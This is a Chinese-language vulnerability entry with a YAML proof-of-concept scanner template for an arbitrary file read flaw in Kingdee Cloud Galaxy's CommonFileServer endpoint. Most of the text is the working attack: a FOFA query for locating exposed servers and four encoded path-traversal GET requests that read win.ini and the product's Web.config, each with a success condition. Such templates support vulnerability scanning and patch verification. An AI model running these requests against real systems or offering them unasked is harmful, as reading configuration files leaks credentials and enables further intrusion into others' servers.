漏洞描述
金蝶OA 云星空 CommonFileServer接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感文件,进一步攻击服务器
FOFA: app="金蝶云星空-管理中心"
kingdee-commonfileserver-fileread: 金蝶云星空 CommonFileserver 任意文件读取漏洞
PoC代码[已公开]
id: kingdee-commonfileserver-fileread
info:
name: 金蝶云星空 CommonFileserver 任意文件读取漏洞
author: zan8in
severity: high
verified: true
description: |-
金蝶OA 云星空 CommonFileServer接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感文件,进一步攻击服务器
FOFA: app="金蝶云星空-管理中心"
tags: kingdee,fileread
created: 2023/08/15
rules:
r0:
request:
method: GET
path: /CommonFileServer/c%3a%2fwindows%2fwin.ini
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
r1:
request:
method: GET
path: /CommonFileServer/C%3A%5CProgram%20Files%20%28x86%29%5CKingdee%5CK3Cloud%5CWebSite%5CWeb.config
expression: response.status == 200 && response.body.bcontains(b'<?xml version="1.0"') && response.body.bcontains(b'<configuration>')
r2:
request:
method: GET
path: /K3Cloud/CommonFileServer/c%3a%2fwindows%2fwin.ini
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
r3:
request:
method: GET
path: /K3Cloud/CommonFileServer/C%3A%5CProgram%20Files%20%28x86%29%5CKingdee%5CK3Cloud%5CWebSite%5CWeb.config
expression: response.status == 200 && response.body.bcontains(b'<?xml version="1.0"') && response.body.bcontains(b'<configuration>')
expression: r0() || r1() || r2() || r3()